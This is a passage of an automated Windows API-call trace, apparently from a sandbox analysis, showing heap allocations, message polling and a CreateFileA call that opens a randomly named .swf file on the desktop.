| out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0076.210] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.210] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0076.210] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.210] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0076.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0076.210] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0076.211] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0076.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0076.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690900 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0076.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfa0 [0076.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e318 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0076.211] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0076.211] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0076.211] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0076.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0076.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0076.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0076.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0076.212] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0076.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.212] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0076.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0076.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0076.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0076.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0076.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.213] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.213] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0076.214] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0076.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.214] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0076.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0076.214] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0076.214] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.214] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0076.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0076.215] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0076.215] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.216] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696a48 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.216] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.216] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.217] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.217] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0076.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76e510, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.218] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76e510, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.218] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf", cchWideChar=57, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0076.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf", cchWideChar=57, lpMultiByteStr=0x74b420, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf", lpUsedDefaultChar=0x0) returned 57 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0076.218] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0076.219] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6ibbdx1qsrydlz.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0076.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=57, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0076.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=57, lpWideCharStr=0x660098, cchWideChar=57 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.swf") returned 57 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x660098 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0076.219] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.220] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.220] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0076.221] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 